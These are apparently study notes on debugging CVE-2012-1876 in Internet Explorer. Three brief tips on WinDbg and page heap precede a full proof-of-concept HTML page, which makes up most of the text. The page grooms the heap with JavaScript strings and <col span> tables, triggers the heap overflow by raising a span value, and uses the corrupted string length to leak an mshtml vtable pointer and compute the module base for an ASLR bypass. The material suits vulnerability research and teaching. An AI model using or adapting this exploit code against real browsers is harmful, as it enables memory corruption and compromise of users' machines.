CVE-2012-1876調試要點

    調試要點:javascript

  1. `.childdbg 1` 命令無效時,可在將 poc.html 拖入 IE 之後直接 Attach;中間會出現 IE 加載 ActiveX 控件的提示使 IE 暫停,正好可以在此時完成 Attach
  2. 進行真實的 exp 調試時,需關閉 hpa(頁堆,gflags 的 +hpa 選項),使程序的堆管理在正常狀況下進行;頁堆會改變堆塊的分配位置與大小,本 PoC 依賴的堆佈局就無法形成
  3. 此 PoC 的思路是先通過 JS 分配堆內存,然後再釋放其中一部分,使已分配的堆塊之間直接產生空閒的間隙堆塊;之後解析 <table> 時會分配 0x1C*max(span,4) 大小的堆塊,PoC 中設置 span=9,是因為 0x1C*9=0xFC<0x100,恰好使之前釋放的 0x100 大小的間隙堆塊再次被分配出來;最後 JS 把 <col> 的 span 設為 19,造成溢出。因此總結起來堆塊的操作順序就是:先由 JS 代碼不斷分配、釋放,構成空閒間隙堆塊的佈局 -> 解析 <table> 中 <col> 的 span 屬性,把空閒間隙堆塊分配出來 -> JS 代碼修改 span 屬性,造成堆複製溢出。按照 HTML 從上到下的解析順序得到的 PoC 代碼如下
    <html>
    <body>
    <div id="evil"></div>
    <script language='javascript'>
    
            // Shared with the second <script> block, which stores the index of
            // the arr[] entry hit by the overflow here; declared up front so it
            // exists even if that scan never matches.
            var leak_index = -1;

            // Three 512-character source strings (4 -> 8 -> ... -> 512 by
            // doubling until the length reaches 480). Only 125-character
            // substrings of them are handed out in the loop below.
            var dap = "EEEE";
            while ( dap.length < 480 ) dap += dap;

            var padding = "AAAA";
            while ( padding.length < 480 ) padding += padding;

            var filler = "BBBB";
            while ( filler.length < 480 ) filler += filler;


            // arr[] holds the strings that stay alive and are later scanned for
            // a corrupted length; rra[] holds the strings that get freed again
            // to punch holes into the layout.
            var arr = new Array();
            var rra = new Array();

            // Hidden container: the 250 <button> elements created below must be
            // attached to the document so their layout objects are allocated,
            // but should not be visible.
            var div_container = document.getElementById("evil");
            div_container.style.cssText = "display:none";
            // 1. Lay out the heap. (0x100-6)/2 = 125 characters: the 6 bytes
            // subtracted account for the BSTR's 4-byte length prefix and 2-byte
            // terminator, so every substring() result below is a 0x100-byte
            // allocation -- the size the <col span="9"> chunks in the markup
            // (0x1C*9 = 0xFC, see the write-up above) are meant to reclaim.
            // Each iteration allocates, in order: an "E" string (rra[i]), an
            // "A" string (arr[i]), a "B" string (arr[i+1]) and a button element.
            // The single-letter tags are the original author's labels for the
            // intended heap pattern; where each allocation actually lands is not
            // derivable from this code and has to be confirmed in the debugger.
            for (var i=0; i < 500; i+=2) {

                // E -- the string that will be freed later to open a hole
                rra[i] = dap.substring(0, (0x100-6)/2);

                // S, bstr = A -- kept alive; its length field is what the
                // overflow is expected to corrupt
                arr[i] = padding.substring(0, (0x100-6)/2);

                // A, bstr = B -- kept alive
                arr[i+1] = filler.substring(0, (0x100-6)/2);

                // B -- a button element, so that an object with a vtable
                // pointer follows the strings (per the second script's comment)
                var obj = document.createElement("button");
                div_container.appendChild(obj);

            }

            // Release every rra[i] from index 200 upward; the first 100 "E"
            // strings are left allocated so the lower part of the layout stays
            // undisturbed. CollectGarbage() after each release is intended to
            // return the BSTR to the heap immediately, leaving a 0x100-byte
            // hole that the <col> allocations in the markup below can reuse.
            for (var i=200; i<500; i+=2 ) {
                rra[i] = null;
                CollectGarbage();
            }
    
    
    </script>
    <!-- 2. Reclaim the freed gap chunks: each <col span="9"> is meant to allocate a 0x1C*9 = 0xFC-byte chunk, which fits the 0x100-byte holes left by the script above (this used to be a bare "//" line that rendered as page text) -->
    <table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="4" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="5" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="6" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="7" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="8" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="9" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="10" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="11" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="12" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="13" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="14" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="15" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="16" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="17" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="18" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="19" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="20" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="21" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="22" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="23" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="24" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="25" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="26" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="27" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="28" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="29" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="30" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="31" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="32" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="33" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="34" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="35" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="36" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="37" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="38" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="39" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="40" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="41" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="42" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="43" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="44" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="45" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="46" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="47" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="48" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="49" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="50" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="51" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="52" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="53" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="54" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="55" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="56" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="57" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="58" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="59" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="60" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="61" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="62" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="63" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="64" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="65" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="66" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="67" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="68" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="69" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="70" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="71" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="72" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="73" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="74" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="75" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="76" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="77" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="78" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="79" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="80" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="81" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="82" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="83" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="84" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="85" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="86" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="87" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="88" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="89" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="90" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="91" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="92" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="93" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="94" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="95" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="96" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="97" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="98" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="99" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="100" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="101" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="102" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="103" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="104" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="105" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="106" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="107" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="108" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="109" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="110" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="111" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="112" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="113" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="114" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="115" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="116" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="117" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="118" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="119" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="120" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="121" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="122" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="123" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="124" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="125" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="126" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="127" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="128" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="129" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="130" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="131" width="41" span="9" >&nbsp</col></table>
    <table style="table-layout:fixed" ><col id="132" width="41" span="9" >&nbsp</col></table>
    
    <script language='javascript'>	
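        // 3. Change the span attribute to trigger the heap copy overflow.
        // id="132" is the last <col> parsed, i.e. the one most likely to be
        // sitting in one of the 0x100-byte holes; raising span from 9 to 19
        // makes the layout code copy past the end of its 0xFC-byte chunk
        // (per the write-up above).
        var evil_col = document.getElementById("132");
        evil_col.span = "19";
        alert("after over flow");

        // Scan for the BSTR whose length prefix was overwritten. A 125-character
        // string can only report a larger length if its header was corrupted,
        // so this check doubles as "did the overflow land where expected".
        var leak_addr=-1;
        for(var i = 0;i<500;i++){
            if(arr[i].length>(0x100-6)/2){
                leak_index=i;
                // Read two UTF-16 code units past the original end of the
                // string: index 125 is the 2-byte terminator, the following
                // 8 bytes are presumably the adjacent chunk's heap header, and
                // the 4 bytes after that are taken as the first dword of the
                // next object -- its vtable pointer according to the write-up
                // (the button's layout object). Confirm in the debugger.
                var leak=arr[i].substring((0x100-6)/2+(2+8)/2,(0x100-6)/2+(2+8+4)/2);
                // Little-endian dword: code unit 0 is the low 16 bits, code
                // unit 1 the high 16 bits. Assembled arithmetically rather than
                // by concatenating toString(16) output, which is not
                // zero-padded and silently produced a wrong address whenever
                // either half was below 0x1000 (0x6f12 / 0x00a8 -> "6f12a8").
                leak_addr = leak.charCodeAt(1) * 0x10000 + leak.charCodeAt(0);
                alert(leak_addr.toString(16));
                // Vtable RVA for one specific mshtml.dll build only; it must be
                // re-measured for any other version (vtable - RVA = module base).
                leak_addr=leak_addr-Number(0x001584f8);
                alert(leak_addr.toString(16));
                break;
            }
        }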
    </script>
    
    
    </body>
    </html>